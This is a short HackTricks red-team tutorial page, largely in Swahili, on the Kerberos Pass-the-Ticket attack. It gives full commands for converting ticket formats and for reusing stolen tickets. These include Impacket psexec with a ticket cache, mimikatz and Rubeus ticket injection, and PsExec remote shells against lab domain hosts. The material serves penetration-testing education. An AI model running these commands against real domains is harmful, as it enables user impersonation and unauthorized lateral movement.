Pass the Ticket

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Pass The Ticket (PTT)

Katika mbinu ya shambulio ya Pass The Ticket (PTT), washambuliaji hupora tiketi ya uthibitishaji ya mtumiaji badala ya nenosiri au thamani za hash. Tiketi hii iliyoporwa inatumika kufanana na mtumiaji, ikipata ufikiaji usioidhinishwa kwa rasilimali na huduma ndani ya mtandao.

Soma:

Swaping Linux and Windows tickets between platforms

Zana ya ticket_converter inabadilisha muundo wa tiketi kwa kutumia tiketi yenyewe na faili ya matokeo.

bash
python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

Katika Windows Kekeo inaweza kutumika.

Shambulio la Pass The Ticket

Linux
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
Windows
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks